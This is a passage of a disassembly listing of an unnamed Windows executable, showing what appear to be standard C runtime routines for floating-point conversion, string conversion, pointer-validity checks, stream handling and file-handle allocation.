; sub_42031E+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_4203AF
or eax, 40000h
locret_4203AF: ; CODE XREF: sub_42031E+8A�j
retn
sub_42031E endp
; =============== S U B R O U T I N E =======================================
sub_4203B0 proc near ; CODE XREF: sub_4202D3+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_4203C0
push 1
pop eax
loc_4203C0: ; CODE XREF: sub_4203B0+B�j
test bl, 8
jz short loc_4203C7
or al, 4
loc_4203C7: ; CODE XREF: sub_4203B0+13�j
test bl, 4
jz short loc_4203CE
or al, 8
loc_4203CE: ; CODE XREF: sub_4203B0+1A�j
test bl, 2
jz short loc_4203D5
or al, 10h
loc_4203D5: ; CODE XREF: sub_4203B0+21�j
test bl, 1
jz short loc_4203DC
or al, 20h
loc_4203DC: ; CODE XREF: sub_4203B0+28�j
test ebx, 80000h
jz short loc_4203E6
or al, 2
loc_4203E6: ; CODE XREF: sub_4203B0+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_420413
cmp ecx, 100h
jz short loc_420410
cmp ecx, esi
jz short loc_42040B
cmp ecx, edx
jnz short loc_420413
or ah, 0Ch
jmp short loc_420413
; ---------------------------------------------------------------------------
loc_42040B: ; CODE XREF: sub_4203B0+50�j
or ah, 8
jmp short loc_420413
; ---------------------------------------------------------------------------
loc_420410: ; CODE XREF: sub_4203B0+4C�j
or ah, 4
loc_420413: ; CODE XREF: sub_4203B0+44�j
; sub_4203B0+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_420429
cmp ecx, 10000h
jnz short loc_42042B
or eax, esi
jmp short loc_42042B
; ---------------------------------------------------------------------------
loc_420429: ; CODE XREF: sub_4203B0+6B�j
or eax, edx
loc_42042B: ; CODE XREF: sub_4203B0+73�j
; sub_4203B0+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_420438
or ah, 10h
locret_420438: ; CODE XREF: sub_4203B0+83�j
retn
sub_4203B0 endp
; =============== S U B R O U T I N E =======================================
sub_420439 proc near ; CODE XREF: sub_4204D8+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_42047E
inc esi
cmp esi, 3
jge short loc_420479
lea eax, [eax+esi*4]
loc_42046B: ; CODE XREF: sub_420439+3E�j
cmp dword ptr [eax], 0
jnz short loc_42047E
inc esi
add eax, 4
cmp esi, 3
jl short loc_42046B
loc_420479: ; CODE XREF: sub_420439+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_42047E: ; CODE XREF: sub_420439+27�j
; sub_420439+35�j
xor eax, eax
pop esi
retn
sub_420439 endp
; =============== S U B R O U T I N E =======================================
sub_420482 proc near ; CODE XREF: sub_4204D8+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_421813
add esp, 0Ch
dec esi
js short loc_4204D4
lea edi, [ebx+esi*4]
loc_4204BB: ; CODE XREF: sub_420482+50�j
test eax, eax
jz short loc_4204D4
push edi
push 1
push dword ptr [edi]
call sub_421813
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_4204BB
loc_4204D4: ; CODE XREF: sub_420482+34�j
; sub_420482+3B�j
pop edi
pop esi
pop ebx
retn
sub_420482 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204D8 proc near ; CODE XREF: sub_420633+81�p
; sub_420633+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_42053C
inc ebx
push ebx
push [ebp+arg_0]
call sub_420439
pop ecx
test eax, eax
pop ecx
jnz short loc_420539
push edi
push [ebp+arg_0]
call sub_420482
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_420539: ; CODE XREF: sub_4204D8+51�j
mov eax, [ebp+arg_4]
loc_42053C: ; CODE XREF: sub_4204D8+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_42055C
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_42055C: ; CODE XREF: sub_4204D8+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4204D8 endp
; =============== S U B R O U T I N E =======================================
sub_420564 proc near ; CODE XREF: sub_420633+75�p
; sub_420633+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_420572: ; CODE XREF: sub_420564+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_420572
pop esi
retn
sub_420564 endp
; =============== S U B R O U T I N E =======================================
sub_42057F proc near ; CODE XREF: sub_420633+5F�p
; sub_420633+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_42057F endp
; =============== S U B R O U T I N E =======================================
sub_42058B proc near ; CODE XREF: sub_420633+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_420591: ; CODE XREF: sub_42058B+12�j
cmp dword ptr [eax], 0
jnz short loc_4205A3
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_420591
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_4205A3: ; CODE XREF: sub_42058B+9�j
xor eax, eax
retn
sub_42058B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4205A6 proc near ; CODE XREF: sub_420633+C0�p
; sub_420633+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_4205DC: ; CODE XREF: sub_4205A6+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_4205DC
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_42060E: ; CODE XREF: sub_4205A6+86�j
cmp ebx, edi
jl short loc_420621
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_420628
; ---------------------------------------------------------------------------
loc_420621: ; CODE XREF: sub_4205A6+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_420628: ; CODE XREF: sub_4205A6+79�j
dec ebx
sub ecx, 4
jns short loc_42060E
pop edi
pop esi
pop ebx
leave
retn
sub_4205A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420633 proc near ; CODE XREF: sub_42079F+D�p
; sub_4207B5+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_4206A0
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_42058B
test eax, eax
pop ecx
jnz loc_42075F
lea eax, [ebp+var_C]
push eax
call sub_42057F
pop ecx
loc_420698: ; CODE XREF: sub_420633+E4�j
push 2
loc_42069A: ; CODE XREF: sub_420633+110�j
pop eax
jmp loc_420761
; ---------------------------------------------------------------------------
loc_4206A0: ; CODE XREF: sub_420633+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_420564
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_4204D8
add esp, 10h
test eax, eax
jz short loc_4206C1
inc ebx
loc_4206C1: ; CODE XREF: sub_420633+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_4206D9
lea eax, [ebp+var_C]
push eax
call sub_42057F
pop ecx
jmp short loc_420715
; ---------------------------------------------------------------------------
loc_4206D9: ; CODE XREF: sub_420633+98�j
cmp ebx, eax
jg short loc_42071C
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_420564
lea eax, [ebp+var_C]
push esi
push eax
call sub_4205A6
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_4204D8
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_4205A6
add esp, 20h
loc_420715: ; CODE XREF: sub_420633+A4�j
xor esi, esi
jmp loc_420698
; ---------------------------------------------------------------------------
loc_42071C: ; CODE XREF: sub_420633+A8�j
cmp ebx, [edi]
jl short loc_420748
lea eax, [ebp+var_C]
push eax
call sub_42057F
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_4205A6
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_42069A
; ---------------------------------------------------------------------------
loc_420748: ; CODE XREF: sub_420633+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_4205A6
pop ecx
pop ecx
loc_42075F: ; CODE XREF: sub_420633+55�j
xor eax, eax
loc_420761: ; CODE XREF: sub_420633+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_420790
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_42079A
; ---------------------------------------------------------------------------
loc_420790: ; CODE XREF: sub_420633+14E�j
cmp edi, 20h
jnz short loc_42079A
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_42079A: ; CODE XREF: sub_420633+15B�j
; sub_420633+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_420633 endp
; =============== S U B R O U T I N E =======================================
sub_42079F proc near ; CODE XREF: sub_4207CB+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 4406D0h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_420633
add esp, 0Ch
retn
sub_42079F endp
; =============== S U B R O U T I N E =======================================
sub_4207B5 proc near ; CODE XREF: sub_4207F8+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 4406E8h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_420633
add esp, 0Ch
retn
sub_4207B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4207CB proc near ; CODE XREF: sub_41CC14+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4219B4
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_42079F
add esp, 24h
leave
retn
sub_4207CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4207F8 proc near ; CODE XREF: sub_41CC14+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4219B4
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_4207B5
add esp, 24h
leave
retn
sub_4207F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420825 proc near ; CODE XREF: sub_41CC52+65�p
; sub_41CD56+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_420862
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_420848: ; CODE XREF: sub_420825+38�j
mov dl, [ecx]
test dl, dl
jz short loc_420854
movsx edx, dl
inc ecx
jmp short loc_420857
; ---------------------------------------------------------------------------
loc_420854: ; CODE XREF: sub_420825+27�j
push 30h
pop edx
loc_420857: ; CODE XREF: sub_420825+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_420848
mov edx, [ebp+arg_8]
loc_420862: ; CODE XREF: sub_420825+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_42087B
cmp byte ptr [ecx], 35h
jl short loc_42087B
loc_42086E: ; CODE XREF: sub_420825+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_420879
mov byte ptr [eax], 30h
jmp short loc_42086E
; ---------------------------------------------------------------------------
loc_420879: ; CODE XREF: sub_420825+4D�j
inc byte ptr [eax]
loc_42087B: ; CODE XREF: sub_420825+42�j
; sub_420825+47�j
cmp byte ptr [esi], 31h
jnz short loc_420885
inc dword ptr [edx+4]
jmp short loc_420897
; ---------------------------------------------------------------------------
loc_420885: ; CODE XREF: sub_420825+59�j
push edi
call sub_4180D0
inc eax
push eax
push edi
push esi
call sub_4188B0
add esp, 10h
loc_420897: ; CODE XREF: sub_420825+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_420825 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42089C proc near ; CODE XREF: sub_41CC52+3F�p
; sub_41CD56+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_420900
pop ecx
lea esi, [ebp+var_C]
pop ecx
push 51A490h
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_421E85
mov dword ptr byte_445EDC+0D45DCh, eax
add esp, 18h
movsx eax, byte_445EDC+0D45B6h
mov dword ptr byte_445EDC+0D45D4h, eax
pop edi
movsx eax, word ptr byte_445EDC+0D45B4h
mov dword ptr byte_445EDC+0D45D8h, eax
mov dword ptr byte_445EDC+0D45E0h, 51A494h
mov eax, 51A4B0h
pop esi
leave
retn
sub_42089C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420900 proc near ; CODE XREF: sub_42089C+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_42094E
cmp ebx, edi
jz short loc_420947
lea edi, [ecx+3C00h]
jmp short loc_42096F
; ---------------------------------------------------------------------------
loc_420947: ; CODE XREF: sub_420900+3D�j
mov edi, 7FFFh
jmp short loc_42096F
; ---------------------------------------------------------------------------
loc_42094E: ; CODE XREF: sub_420900+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_420966
cmp edx, ebx
jnz short loc_420966
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_4209B1
; ---------------------------------------------------------------------------
loc_420966: ; CODE XREF: sub_420900+52�j
; sub_420900+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_42096F: ; CODE XREF: sub_420900+45�j
; sub_420900+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_420987: ; CODE XREF: sub_420900+A6�j
test ecx, esi
jnz short loc_4209A8
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_420987
; ---------------------------------------------------------------------------
loc_4209A8: ; CODE XREF: sub_420900+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_4209B1: ; CODE XREF: sub_420900+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_420900 endp
; ---------------------------------------------------------------------------
push 2
call sub_41A45C
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4209BF: ; DATA XREF: .text:00420A05�o
push esi
mov esi, [esp+8]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4209E2
cmp dword ptr [eax+10h], 3
jnz short loc_4209E2
cmp dword ptr [eax+14h], 19930520h
jnz short loc_4209E2
jmp sub_41D7DC
; ---------------------------------------------------------------------------
loc_4209E2: ; CODE XREF: .text:004209CC�j
; .text:004209D2�j ...
mov eax, dword ptr byte_445EDC+0D45E4h
test eax, eax
jz short loc_4209FF
push eax
call sub_420A5B
test eax, eax
pop ecx
jz short loc_4209FF
push esi
call dword ptr byte_445EDC+0D45E4h
jmp short loc_420A01
; ---------------------------------------------------------------------------
loc_4209FF: ; CODE XREF: .text:004209E9�j
; .text:004209F4�j
xor eax, eax
loc_420A01: ; CODE XREF: .text:004209FD�j
pop esi
retn 4
; ---------------------------------------------------------------------------
push offset loc_4209BF
call dword ptr byte_424024
mov dword ptr byte_445EDC+0D45E4h, eax
retn
; ---------------------------------------------------------------------------
push dword ptr byte_445EDC+0D45E4h
call dword ptr byte_424024
retn
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_420A23(void *lp, UINT_PTR ucb)
sub_420A23 proc near ; CODE XREF: sub_41D02A+6B�p
; sub_41D53B+61�p ...
lp = dword ptr 4
ucb = dword ptr 8
push esi
push 1
pop esi
push [esp+4+ucb] ; ucb
push [esp+8+lp] ; lp
call IsBadReadPtr ; IsBadReadPtr
test eax, eax
jz short loc_420A3B
xor esi, esi
loc_420A3B: ; CODE XREF: sub_420A23+14�j
mov eax, esi
pop esi
retn
sub_420A23 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_420A3F(LPVOID lp, UINT_PTR ucb)
sub_420A3F proc near ; CODE XREF: sub_41D53B+73�p
; sub_41D53B+BF�p ...
lp = dword ptr 4
ucb = dword ptr 8
push esi
push 1
pop esi
push [esp+4+ucb] ; ucb
push [esp+8+lp] ; lp
call IsBadWritePtr ; IsBadWritePtr
test eax, eax
jz short loc_420A57
xor esi, esi
loc_420A57: ; CODE XREF: sub_420A3F+14�j
mov eax, esi
pop esi
retn
sub_420A3F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_420A5B(FARPROC lpfn)
sub_420A5B proc near ; CODE XREF: sub_41D53B+15B�p
; .text:004209EC�p
lpfn = dword ptr 4
push esi
push 1
pop esi
push [esp+4+lpfn] ; lpfn
call IsBadCodePtr ; IsBadCodePtr
test eax, eax
jz short loc_420A6F
xor esi, esi
loc_420A6F: ; CODE XREF: sub_420A5B+10�j
mov eax, esi
pop esi
retn
sub_420A5B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D7DC
loc_420A73: ; CODE XREF: sub_41D7DC+51�j
push 0Ah ; NumberOfBytesWritten
call sub_41FEA9
push 16h
call sub_422118
pop ecx
pop ecx
push 3 ; uExitCode
call sub_41A246
; END OF FUNCTION CHUNK FOR sub_41D7DC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_420A8A(LPWSTR lpWideCharStr, LPCSTR lpMultiByteStr, int)
sub_420A8A proc near ; CODE XREF: sub_41D9B5+6A3�p
lpWideCharStr = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+lpMultiByteStr]
xor ebx, ebx
cmp esi, ebx
jz short loc_420AAD
cmp [ebp+arg_8], ebx
jz short loc_420AAD
mov al, [esi]
cmp al, bl
jnz short loc_420AB3
mov eax, [ebp+lpWideCharStr]
cmp eax, ebx
jz short loc_420AAD
mov [eax], bx
loc_420AAD: ; CODE XREF: sub_420A8A+C�j
; sub_420A8A+11�j ...
xor eax, eax
loc_420AAF: ; CODE XREF: sub_420A8A+42�j
; sub_420A8A+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420AB3: ; CODE XREF: sub_420A8A+17�j
cmp dword ptr byte_445EDC+0D4474h, ebx
jnz short loc_420ACE
mov ecx, [ebp+lpWideCharStr]
cmp ecx, ebx
jz short loc_420AC9
movzx ax, al
mov [ecx], ax
loc_420AC9: ; CODE XREF: sub_420A8A+36�j
; sub_420A8A+C0�j
push 1
pop eax
jmp short loc_420AAF
; ---------------------------------------------------------------------------
loc_420ACE: ; CODE XREF: sub_420A8A+2F�j
mov ecx, dword_43DD30
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_420B2B
mov eax, cbMultiByte
cmp eax, 1
jle short loc_420B12
cmp [ebp+arg_8], eax
jl short loc_420B1C
xor ecx, ecx
cmp [ebp+lpWideCharStr], ebx
setnz cl
push ecx ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push eax ; cbMultiByte
push esi ; lpMultiByteStr
push 9 ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
mov eax, cbMultiByte
jnz short loc_420AAF
loc_420B12: ; CODE XREF: sub_420A8A+5C�j
cmp [ebp+arg_8], eax
jb short loc_420B1C
cmp [esi+1], bl
jnz short loc_420AAF
loc_420B1C: ; CODE XREF: sub_420A8A+61�j
; sub_420A8A+8B�j ...
mov dword ptr byte_445EDC+0D43E4h, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_420AAF
; ---------------------------------------------------------------------------
loc_420B2B: ; CODE XREF: sub_420A8A+52�j
xor eax, eax
cmp [ebp+lpWideCharStr], ebx
setnz al
push eax ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push 1 ; cbMultiByte
push esi ; lpMultiByteStr
push 9 ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jnz loc_420AC9
jmp short loc_420B1C
sub_420A8A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_420B52(WORD CharType)
sub_420B52 proc near ; CODE XREF: sub_41D9B5+76�p
; sub_41D9B5+88�p ...
CharType = word ptr 4
cmp cbMultiByte, 1
jle short loc_420B69
push 8 ; int
push dword ptr [esp+4+CharType] ; CharType
call sub_41ADC4
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420B69: ; CODE XREF: sub_420B52+7�j
mov eax, dword ptr [esp+CharType]
mov ecx, dword_43DD30
mov al, [ecx+eax*2]
and eax, 8
retn
sub_420B52 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_420B80 proc near ; CODE XREF: sub_41D9B5+797�p
; sub_41D9B5+7E7�p
cmp cl, 40h
jnb short loc_420B9A
cmp cl, 20h
jnb short loc_420B90
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_420B90: ; CODE XREF: sub_420B80+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_420B9A: ; CODE XREF: sub_420B80+3�j
xor eax, eax
xor edx, edx
retn
sub_420B80 endp
; =============== S U B R O U T I N E =======================================
sub_420B9F proc near ; CODE XREF: sub_41E42B+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_420BEB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_420BBD
test al, 80h
jz short loc_420BEB
test al, 2
jnz short loc_420BEB
loc_420BBD: ; CODE XREF: sub_420B9F+14�j
cmp dword ptr [esi+8], 0
jnz short loc_420BCA
push esi
call sub_41FFFC
pop ecx
loc_420BCA: ; CODE XREF: sub_420B9F+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_420BDA
cmp dword ptr [esi+4], 0
jnz short loc_420BEB
inc eax
mov [esi], eax
loc_420BDA: ; CODE XREF: sub_420B9F+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_420BF1
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_420BF7
inc eax
mov [esi], eax
loc_420BEB: ; CODE XREF: sub_420B9F+9�j
; sub_420B9F+18�j ...
or eax, 0FFFFFFFFh
loc_420BEE: ; CODE XREF: sub_420B9F+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_420BF1: ; CODE XREF: sub_420B9F+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_420BF7: ; CODE XREF: sub_420B9F+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_420BEE
sub_420B9F endp
; =============== S U B R O U T I N E =======================================
sub_420C0D proc near ; CODE XREF: sub_420E27:loc_420F9F�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, 51B800h
loc_420C1C: ; CODE XREF: sub_420C0D+48�j
mov eax, [ecx]
test eax, eax
jz short loc_420C59
lea edx, [eax+100h]
loc_420C28: ; CODE XREF: sub_420C0D+28�j
cmp eax, edx
jnb short loc_420C48
test byte ptr [eax+4], 1
jz short loc_420C37
add eax, 8
jmp short loc_420C28
; ---------------------------------------------------------------------------
loc_420C37: ; CODE XREF: sub_420C0D+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_420C9C
loc_420C48: ; CODE XREF: sub_420C0D+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, 51B900h
jl short loc_420C1C
jmp short loc_420C9C
; ---------------------------------------------------------------------------
loc_420C59: ; CODE XREF: sub_420C0D+13�j
mov esi, 100h
push esi
call sub_418175
test eax, eax
pop ecx
jz short loc_420C9C
add dword ptr byte_445EDC+0D5A24h, 20h
lea ecx, ds:51B800h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_420C7F: ; CODE XREF: sub_420C0D+88�j
cmp eax, edx
jnb short loc_420C97
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_420C7F
; ---------------------------------------------------------------------------
loc_420C97: ; CODE XREF: sub_420C0D+74�j
shl edi, 5
mov ebx, edi
loc_420C9C: ; CODE XREF: sub_420C0D+39�j
